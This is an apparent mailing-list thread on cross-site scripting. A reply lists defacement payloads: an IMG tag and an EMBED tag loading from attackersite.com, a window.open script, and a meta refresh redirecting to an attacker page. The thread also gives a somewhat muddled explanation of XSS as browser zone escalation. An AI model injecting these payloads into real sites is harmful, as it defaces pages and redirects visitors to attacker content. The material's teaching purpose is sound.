Hi, Further level of XSS........
Q. What can be done with XSS? Q. How severe can XSS effect? The below inputs gives us a clarity what actually XSS is worth of!!!!! Checkout the Principle methods of Defacing using XSS: Defacement using Image: <IMG SRC="http://attackersite.com/malicious.png"> Defacement using a Flash Video: <EMBED SRC="http://attackersite.com/malicious.swf" Defacement using Redirection to attackers Page: <script>window.open( "http://www.attackersite.com/malicious.html" )</ script> Also: <meta http-equiv="refresh" content="0; url=http://attackersite.com/ malicious.html" /> Now, after going thru the above inputs we can understand how severe its effect can be. As an conclusion, XSS can compromise your system and also turnup to be a zombie. ***Please quote your inputs to have more elaborated and different ways to hit XSS. Regards, 0xN41K On May 12, 7:38 am, N41K <[email protected]> wrote: > Hi, > > From today onwards we are going to have Chapters for Application > Security. Hope every one will put there expertise and make this > Chapter a fully informative. > > Lets, GoAhead with XSS (Cross Site Scripting) > > Cross Site Scripting is a browser exploit taking advantage of a > vulnerability within a zone-based security solution. > The attack allows content (scripts) in unprivileged zones to be > executed with the permissions of a privileged zone - i.e. > a privilege escalation within the client (web browser) executing the > script. > > The attack can occur on: > > * a web browser (HTTP Client) vulnerability which under some > conditions allows content (scripts) > to be executed with the permissions of a higher privileged > zone(Administrator). > > * a web browser configuration error; unsafe sites listed in > privileged zones. > > * a cross-site scripting vulnerability(from Web Application) > within a privileged zone > > The common attack scenario involves two steps: > i. To use XSS vulnerability and execute scripts within a > privileged Zone. The Script may be any JS(JavaScript) which > performs some malicious action. > ii. Hit the vulnerability using ActiveX components( PC gets > Compromised). > > Such Vulnerabilities has been exploited and silently installed various > MALWARES ( such as Remote control Software, Worms, Viruses, Trojans, > Keyloggers, etc..) > > All such things happens when a user Browses a malicious Web Page. > > Finally, Use a Safer Web Browser and Surf a Safer Web Site. > > *** If any one would like to add points for this topic, All are > welcome. > > Regards, > 0xN41K > > -- > You received this message because you are subscribed to the Google Groups > "nforceit" group. > To post to this group, send an email to [email protected]. > To unsubscribe from this group, send email to > [email protected]. > For more options, visit this group > athttp://groups.google.com/group/nforceit?hl=en-GB. -- You received this message because you are subscribed to the Google Groups "nforceit" group. To post to this group, send an email to [email protected]. To unsubscribe from this group, send email to [email protected]. For more options, visit this group at http://groups.google.com/group/nforceit?hl=en-GB.
